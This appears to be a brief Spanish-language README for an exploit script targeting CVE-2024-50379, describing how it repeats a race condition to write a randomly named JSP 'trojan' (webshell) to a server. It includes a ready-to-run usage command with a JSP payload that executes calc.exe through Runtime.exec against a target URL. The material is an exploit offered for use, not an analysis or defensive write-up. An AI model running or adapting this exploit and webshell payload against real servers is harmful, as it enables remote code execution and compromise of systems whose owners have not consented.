
CVE-2024-50379-exp
Las pruebas encontraron que la primera condición de carrera tiene una alta probabilidad de fallar en la escritura, por lo que es necesario realizar otra condición de carrera para escribir el troyano. Por lo tanto, el script primero realizará una detección de condición de carrera fija de 6 segundos para verificar si se escribió; si no, procederá a una detección de 10 segundos definida por el usuario o predeterminada. El troyano generado es un md5.jsp aleatorio.
python .\CVE-2024-50379.py -u http://192.168.31.33:8888/ -f '123456<%Runtime,getRuntime().exec("calc.exe");%>' -t 10
image